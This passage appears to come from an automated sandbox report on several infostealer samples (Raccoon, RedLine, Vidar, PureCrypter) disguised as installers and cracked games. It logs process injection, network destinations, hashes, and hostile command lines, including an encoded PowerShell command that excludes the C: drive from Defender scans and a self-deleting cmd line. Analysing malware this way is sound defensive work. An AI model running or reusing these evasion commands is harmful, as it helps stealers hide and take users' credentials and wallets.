PID 1748 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe C:\Users\Admin\AppData\Local\setup10298.exe
PID 840 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\setup10298.exe C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Furk Ultra_10298.exe"

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hhwnd=459038 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\Temp\7zS8126C44C\GenericSetup.exe

.\GenericSetup.exe hhwnd=459038 hreturntoinstaller hextras=id:3edef7f19b9beb4-US-j0AgN

C:\Users\Admin\AppData\Local\setup10298.exe

C:\Users\Admin\AppData\Local\setup10298.exe hready

C:\Users\Admin\AppData\Local\Temp\7zS8433607D\GenericSetup.exe

.\GenericSetup.exe hready

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 www.dlsft.com udp
N/A 35.190.60.70:443 www.dlsft.com tcp
N/A 8.8.8.8:53 dlsft.com udp
N/A 35.190.60.70:80 dlsft.com tcp
N/A 8.8.8.8:53 filedm.com udp
N/A 188.114.96.0:443 filedm.com tcp
N/A 8.8.8.8:53 flow.lavasoft.com udp
N/A 8.8.8.8:53 sos.adaware.com udp
N/A 104.18.88.101:443 flow.lavasoft.com tcp
N/A 104.16.236.79:443 sos.adaware.com tcp

Files

Analysis: behavioral4

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20221111-en

Max time kernel

124s

Max time network

138s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

Signatures

PureCrypter

loader downloader purecrypter

Raccoon

stealer raccoon

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe N/A

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 364 set thread context of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 4460 wrote to memory of 364 N/A C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1180 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Windows\SysWOW64\cmd.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA3AA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==

Network

Country Destination Domain Proto
N/A 20.189.173.15:443 tcp
N/A 8.8.8.8:53 falcaoliderfm.com.br udp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.220.29:80 tcp
N/A 77.73.133.23:80 77.73.133.23 tcp

Files

memory/364-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

memory/364-135-0x00000000000A0000-0x00000000000A8000-memory.dmp

memory/364-136-0x0000000004F10000-0x00000000054B4000-memory.dmp

memory/364-137-0x0000000004A50000-0x0000000004AE2000-memory.dmp

memory/364-138-0x0000000004C00000-0x0000000004C0A000-memory.dmp

memory/364-139-0x0000000007EB0000-0x0000000007ED2000-memory.dmp

memory/1180-140-0x0000000000000000-mapping.dmp

memory/1180-141-0x0000000002F60000-0x0000000002F96000-memory.dmp

memory/1180-142-0x00000000056F0000-0x0000000005D18000-memory.dmp

memory/1180-143-0x0000000005E90000-0x0000000005EF6000-memory.dmp

memory/1180-144-0x0000000005F00000-0x0000000005F66000-memory.dmp

memory/1180-145-0x0000000006500000-0x000000000651E000-memory.dmp

memory/1180-146-0x0000000007E10000-0x000000000848A000-memory.dmp

memory/1180-147-0x0000000006A40000-0x0000000006A5A000-memory.dmp

memory/1020-148-0x0000000000000000-mapping.dmp

memory/5032-149-0x0000000000000000-mapping.dmp

memory/5032-150-0x0000000000400000-0x000000000041E000-memory.dmp

memory/372-151-0x0000000000000000-mapping.dmp

memory/5032-154-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ad6260b5656f92436334157a2a08961
SHA1 d1fe686740e0b72d1cfb956673c7293fba05869a
SHA256 9c475d6c0f06a27bff2ebf8b3749a4135ae52bf9259029c16c4d3668232bfd80
SHA512 65ec7c87e1e9636e7a27a9ba51b6ce3b6b92e4245a2ef504c895818f29cb9486c0f43cb52750c692e17eda6205058cc29eb2d5de742b203b710fdee19d61ae45

memory/5032-157-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/372-159-0x0000000006960000-0x0000000006992000-memory.dmp

memory/372-160-0x0000000070D90000-0x0000000070DDC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1 bbac1dd8a07c6069415c04b62747d794736d0689
SHA256 47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512 b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

C:\Users\Admin\AppData\LocalLow\nss3.dll

MD5 f67d08e8c02574cbc2f1122c53bfb976
SHA1 6522992957e7e4d074947cad63189f308a80fcf2
SHA256 c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA512 2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

C:\Users\Admin\AppData\LocalLow\mozglue.dll

MD5 f07d9977430e762b563eaadc2b94bbfa
SHA1 da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA256 4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA512 6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

memory/372-164-0x0000000006930000-0x000000000694E000-memory.dmp

memory/372-165-0x0000000007720000-0x000000000772A000-memory.dmp

memory/372-166-0x0000000007970000-0x0000000007A06000-memory.dmp

memory/372-167-0x0000000006A10000-0x0000000006A1E000-memory.dmp

memory/372-168-0x00000000078D0000-0x00000000078EA000-memory.dmp

memory/372-169-0x00000000078B0000-0x00000000078B8000-memory.dmp

memory/5032-170-0x0000000000400000-0x000000000041E000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win7-20221111-en

Max time kernel

142s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

Signatures

RedLine

infostealer redline

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 568 set thread context of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 36

Network

Country Destination Domain Proto
N/A 82.115.223.46:57672 tcp

Files

memory/520-56-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-54-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-61-0x000000000041BCAE-mapping.dmp

memory/568-62-0x0000000000370000-0x00000000003F7000-memory.dmp

memory/520-63-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-64-0x0000000000400000-0x0000000000430000-memory.dmp

memory/1448-65-0x0000000000000000-mapping.dmp

memory/520-66-0x0000000075491000-0x0000000075493000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

26s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

Signatures

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"

Network

N/A

Files

memory/1800-54-0x0000000000CB0000-0x000000000171E000-memory.dmp

memory/1800-55-0x000000001C240000-0x000000001C49E000-memory.dmp

memory/296-56-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-57-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-59-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-61-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-63-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-65-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-66-0x0000000000421BEC-mapping.dmp

memory/296-68-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-69-0x0000000000400000-0x0000000000460000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20220812-en

Max time kernel

140s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

Signatures

Vidar

stealer vidar

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2512 set thread context of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

Network

Country Destination Domain Proto
N/A 93.184.220.29:80 tcp
N/A 8.8.8.8:53 t.me udp
N/A 149.154.167.99:443 t.me tcp
N/A 49.12.113.110:80 49.12.113.110 tcp
N/A 95.101.78.82:80 tcp
N/A 95.101.78.82:80 tcp
N/A 104.80.225.205:443 tcp
N/A 51.11.192.48:443 tcp

Files

memory/2512-132-0x0000000000D90000-0x00000000017FE000-memory.dmp

memory/2512-133-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

memory/4888-134-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-135-0x0000000000421BEC-mapping.dmp

memory/4888-136-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-137-0x0000000000400000-0x0000000000460000-memory.dmp

memory/2512-138-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

memory/4888-139-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-140-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-141-0x0000000051270000-0x0000000051302000-memory.dmp

C:\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

C:\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

memory/2392-162-0x0000000000000000-mapping.dmp

memory/4888-163-0x0000000000400000-0x0000000000460000-memory.dmp

memory/1828-164-0x0000000000000000-mapping.dmp